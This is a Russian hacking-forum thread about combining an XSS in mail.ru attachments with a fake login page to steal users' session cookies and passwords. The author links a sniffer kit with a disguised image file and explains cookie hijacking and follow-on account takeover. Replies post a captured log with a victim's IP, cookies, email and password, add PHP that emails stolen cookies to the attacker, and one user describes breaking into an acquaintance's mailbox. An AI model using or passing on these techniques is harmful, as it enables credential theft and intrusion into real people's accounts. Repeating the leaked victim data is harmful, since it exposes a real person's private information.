Форум АНТИЧАТ - mail.ru: XSS + фейк (2 в 1)

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - mail.ru: XSS + фейк (2 в 1) (https://forum.antichat.xyz/showthread.php?t=95339)

mail.ru: XSS + фейк (2 в 1)

Всем привет :)

Возможно байан, и всёже...

XSS нашёл не я, нашёл вот кто http://webxakep.net/articles/articles-internet/1601-krazha-cookies-na-mail.ru.html но там описана тупо XSS а мы сейчас додумаем сами, как сделать всё поумнее...
/*Кстати хочу сказать что почему-то не у всех это работает, у некоторых при отправке атача <script> заменяется на <xscript> возможно это зависит от браузера, у меня опера 9.62 и всё норм*/
Дальше идёт строго моя импровизация :)
С XSS проблем не будет, надо подумать насчёт фейка... Мы будем выводить страницу входа, надо чтобы мыло отображалось в поле "Имя" ну как стандартный мэйловский вход, для этого надо отпарсить куку "Mpop". Быстро в гуголе нашёл скрипт и взялся за работу
/*Час спустя :) */
Сделал, из кук читается логин, домен и вводится в форму, также при нажатии на кнопку сабмита изменяется action формы, чтобы в опере не палился сниффер при наводе на кнопку :)
URL сниффера надо прописать в функцию x3k_get_action() - найдёте её через Ctrl+F :) (это файл фото)
Автор статьи что я указал выше рекомендует использовать имя файла с расширением .img но это палево, хоть и не большое, но палево, и зачем палиться если этого можно избежать. Способ прибежал в голову секунда за 15 :)
Изменяем формат файла на .jpg Но буква p это не английская ПЭ а русская ЭР, таким образом всё хорошо :) Но вы возможно придумаете для экономии времени такой способ - заходить в "Отправленные" и перенаправлять время следующей жертве, не советую... При первой отправке если мы отправили "фото.jpg" то он так и придёт жертве, а при перенаправке он превратиться в "foto.jrg" а нам этого не надо, поэтому пишите каждый раз письмо заново.

Код:

http://rapidshare.com/files/171369388/mail.ru_sniff_fake.rar.html

http://depositfiles.com/files/rbmgdj9vw

А архиве 4 файла
.htaccess - запрещает доступ к логу из веба
mail-sniffer.log - сюда будут идти куки с XSS и данные с фейка
mail-sniffer.php - сам сниффер который всё обрабатывает
S000001436.jрg - "кагбе" фотография.
Она весит 22кб, если вам кажется этого мало для фотографии, можете дополнить текстом

Код HTML:

<noscript></noscript>

Чёт я ещё хотел сказать... Забыл, вспомню скажу :)
А! Вспомнил! Если жертва не повелась на фейк, пришли только куки, не всё потеряно, прём на вконтакт (все знают что это, не надо объяснять?) высылаем пасс на мыло (98% жертв зареганы на вконтакте) нам приходит пасс, в 85% случаев пасс подходит к мылу, если не на вконтакте, порыскайте почту, должны быть письма с разными регистрациями и высыланиями паролей :)
Ах да! Ещё! Если пришли только куки, то удаляйте всё кроме "Mpop" эта кука самая главная и с её помощью вы сможете лазить по всем сервисам mail.ru (чаты, знакомства, игры) если вы оставите ещё какую-то куку то есть вероятность что куда-то вас не пустят
А! Ещё! В PHP скрипте сниффера защита от школьников, так что не забудьте поправить
Ага! Ещё! Зайдите в "фотографию" и в функции "x3k_get_action()" измените URL сниффера
Ну и ещё... На файл mail-sniffer.log должны быть права на запись
Вроде-бы всё
Видео тем кто не догнал :rolleyes:

Код:

http://rapidshare.com/files/171401947/mail.ru_xss_sniff.rar.html

http://depositfiles.com/files/rscltc8se

(c)Ponchik - forum.antichat.ru

На яндексе тоже похожая была, там алерты вылетали даже из txt кажись.
Молодец, +++

Тама кстате в PHP скрипте
header("Location: http://win.mail.ru/cgi-bin/movemsg?remove&id=$id");
Вот если 2 раза заставить жертву зайти по этой ссыле письмо удалиться полностью, но я игрался, игрался с картинками на JS, не получилось, не моё это :(

Перезалейте куда-нить..))

Fepsis, http://depositfiles.com/files/rbmgdj9vw
Перенесите кто-то тему в E-Mail ато я чёто тупанул

Код:

==========================

Прилетело с сниффера (12.08.08 11:36:54)

IP: 213.134.205.214

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 0, 0, 36 SW; MRA 5.1 (build 02243); MAXTHON 2.0)

Ref: http://af6.mail.ru/cgi-bin/readmsg/S000001436.jrg?id=12287289880000026372;0;1&mode=attachment&channel=

Cookie: VID=0QIH4Y15S9Wa; mrcu=2E50492BE75132D7D7D5D6CD86D5; p=n8m/AbnPqgAA; __utma=56108983.1778233777.1227614052.1228484981.1228726826.16; __utmz=56108983.1228484981.15.13.utmccn=(referral)|utmcsr=2.chat.mail.ru|utmcct=/cgi-xml/info|utmcmd=referral; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAdABcDvAcA; c240=TR5bSQAAAAKF7QMAAAAAApONAQAAAAAA; c8=94o9SQAAAAH5UgIAAAAAAm0OAQAAAAACkYICAAAAAAKTUwQAAAAAApJJAgAAAAAClX4BAAAA; Mpop=1228728991:424c0163005d0842190502190a1d00041c05034f6a5d5e465e07050501071e0809001e5c4b5757555451145a545858194b44:erofeef@mail.ru:-; __utmc=56108983; ticket=f9469fd8-8e2d-4977-ab40-2c1f10c89e04:erofeef@mail.ru

==========================

Прилетело с фейка (12.08.08 11:37:00)

IP: 213.134.205.214

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 0, 0, 36 SW; MRA 5.1 (build 02243); MAXTHON 2.0)

Ref: http://af6.mail.ru/cgi-bin/readmsg/S000001436.jrg?id=12287289880000026372;0;1&mode=attachment&channel=

Мыло из кук: erofeef@mail.ru

Мыло которое ввела жертва: erofeef@mail.ru

Пасс который ввела жертва: 7771

Стыдно, стыдно :D

Молодец!!! Хорошая статья =))
Но сейчас будет куча вопросов... Так что лучше видео запиши =)

Tigger, тож думал над этим, щас запишу :)

Молодец интересно.

Снял видео, но тама смареть нечего, щас пойдут вопросы "А я когда открываю 192.168.0.1/O_o у меня пишет невозможно отобразить" и "А где скачать VMware и возможно-ли через неё ломать акки вконтакте" Х_Х

Видео, это гуд)
А на счёт вопросов, то это естествинно...нада ведь новичкам как то развиватся)
Молодец, +1 )

Молодец. Если можеш, слей ещё раз а то с рапиды вроде удалили, или у меня лажа.

Кста, способ ещё пашет? Авось прикрыли?

блин уже не пашет, просит запрос на скачивание файла :(

Arigona, у мя всё норм работает, открывает фейк, куки идут, всё норм :)

Ponchik,извени, наверно на фирефоксе не пашет. Огромный респект за проделанную работу

перезалейте на рапиду

http://rapidshare.com/files/174280184/mail.ru_sniff_fake.rar.html

было бы интересно увидеть еще проверку, так как если неправильный пароль был введен то и зайти мы не можем

Сегодня вот, кстати, с Паросом игрался, нашел раскрытие пути :

Код:

Can't open /usr/local/www/mail.ru/data/mywap/.templates/Redir.tmpl : No such file or directory

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<HTML><HEAD>

<TITLE>302 Found</TITLE>

</HEAD><BODY>

<H1>Found</H1>

The document has moved <A HREF="http://wap.my.mail.ru/cgi-bin/my/reg?back_after_reg=http://wap.my.mail.ru/?noclear=1">here</A>.<P>

</BODY></HTML>

login999, чёто я непонял... А причём тут мой фейк?

Цитата:

Сообщение от Ponchik

login999, чёто я непонял... А причём тут мой фейк?

Фейк твой ни при чем, просто запостил в тему, где упоминалась mail.ru (мож кому пригодится). Звиняй, если что не так
П.С. - если захочешь, то снесу ... :)

плз дайте рабочий линк!!!!

http://rapidshare.com/files/174280184/mail.ru_sniff_fake.rar.html - рабочий вполне

А чё XSS ещё живая О_о
DIMON4G, ппц, это защита от школьников, убери пост

Цитата:

Сообщение от Arigona

http://rapidshare.com/files/174280184/mail.ru_sniff_fake.rar.html - рабочий вполне

нет, не работает

У меня на снифф приходят только данные с фейка :(

Все?? похоже прикрыли?

неннаю ,посмотрел видео но вот насчет Vmware я нечего непонял ,гугил чтоб понять как её поставить но нечего непонял ,но всё равно молодец !! ЗАчет

пишет ошибку Parse error: syntax error, unexpected T_STRING in /home/a6256423/public_html/mail/mail-sniffer.php on line 7
когда вводишь пароль и наживаешь войти

Цитата:

посмотрел видео но вот насчет Vmware я нечего непонял ,гугил чтоб понять как её поставить но нечего непонял

Вообще-то устанавливать виртуальную машину вовсе не обязательно, что бы проверить, работает ли всё.

Цитата:

пишет ошибку Parse error: syntax error, unexpected T_STRING in /home/a6256423/public_html/mail/mail-sniffer.php on line 7 когда вводишь пароль и наживаешь войти

В этой строчке защита от школьников.

А вот у меня вопрос такой: Как задать разрешение не запись? Или посоветуйте хост, где можно так сделать. И вообще на видео у чела "домашний" Apache сервак. Так как быть?

А! Всё, ребят, не надо. Сам допер. И кукисы и с фейка приходит! +5 Ponchik'у )))

С чем связано, один отчет пришел с куками которые не ставят пароль при обновлении странички.. другой отчет все хорошо... и логин и пароль???

Цитата:

Сообщение от pavlik74

Ты наверно забыл удалить все остальные куки от mail.ru, у меня всё работает. Это насчет первого. А насчет другого отчета - ПОБЕДА!!!
Ставь + Ponchick'у!
Только 1 '-' в том, что жертва обязана обязательно открыть фото прямо из браузера :(

хех, после видео допёрло как работает данный фейк))) гг)

Хм, а ваще зачётная вещь!
Только пашед на ИЕ, в опере не кушает + письмо не удаляется...
--------------------
прошёл тест на знакомой, на фейк не повелась, но через куки вошёл в её мыло... вопрос терь в другом, сменить пасс или изменить данные для восстановления низя, нужен пасс... как его раздобыть?
возможно ли методом "сохранить пароль" фишкой оперы, а потом из файлов оперы вытянуть его? прога у меня есть... только не могу потестить, я отключил запоминалку паролей для мыла.ру (((

to Ponchik , спасибо с меня ++ ))
А возможно сделать что-б работала тема и на мозилу? а то просит скачать сцуко (

добавил "оповещение на мыло", когда жертва прошла сниффер, на мыло придут куки... каму над:
в mail-sniffer.php, в куске работы снифера (до "}else{") вставляем код и меняем мыла на свои:

Код:

$from = "user@mail.ru"; // от кого письмо

$to = "user@mail.ru"; // кому присылаем данные



$subj = " Куки"; // тема письма

$body = " Cookie: $cookie"; // тело письма



$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit"; 

$from=convert_cyr_string($from,"w","k"); 

$to=convert_cyr_string($to,"w","k"); 

$subj=convert_cyr_string($subj,"w","k"); 

$body=convert_cyr_string($body,"w","k"); 

mail($to,$subj,$body,$from);

что за ерунда может быть, обычно нормальные куки, все заходит под ними, а щас какаято ерунда:

Цитата:

Mpop=123279321:0654495076630d6419050219a1d00051c00 074f6a5d5e465e010d061b03077a1f5b445a52416e46584714 5e5b535b4f174345:xxxxxx@inbox.ru:-;

и не заходит под ними.. :/ меня смущает минус в конце.. в чем дело?

возможно в минусе дело... никогда минуса не видел, хз

вот вопрос тоже на счёт куков... в строке с Mpop есть следующее:

Код:

geo_city_id=xxxx;

где можно расшифровать город? гуглил, ничего не нашёл...

Итак, может я и новичок, но последнюю неделю я в этом деле очень поднялся.

Цитата:

Сообщение от Пётр

возможно в минусе дело... никогда минуса не видел, хз

C минусом мне тоже приходило, все работает. Другое дело, что вам приходит не зашифрованный пароль, а некий хеш сессии. А она не долговечна (У mail.ru около часа). Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь. Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках, иначе самому надо размещать и настраивать sendmail а это не приведи господь...

Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов.

Цитата:

Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках

ну эт да, я на платнике сижу (ресселер), пока живой))

Цитата:

Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь

а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит)
ща например весь день захожу на мыло под куками, а вот пасс не наю =\

Цитата:

Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов.

своим оповещение доволен... а вот на счёт логов... приходиться сразу лезть через ftp и смареть... хорошо бы на сам деле сделать удобный просмотр!

Цитата:

а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит)

Там такая вроде такая фишка: когда жертва вводит логин и пасс, mail.ru открывает сессию и единственная "проверка на вшивость" хеш из Mpop. Когда же мы подставляем куки, он при обновлении страницы выводит нам логин и пасс(звездачками), думая, что мы - жертва. Opera пароль вроде сохраняет (по крайней мере у меня).А именно узнать сам пароль наверно проще всего с помощью СИ: пароли на форумах, ВКОНТАКТЕ, и т.д.

А про мой скрипт - к 3 часам ночи допишу)))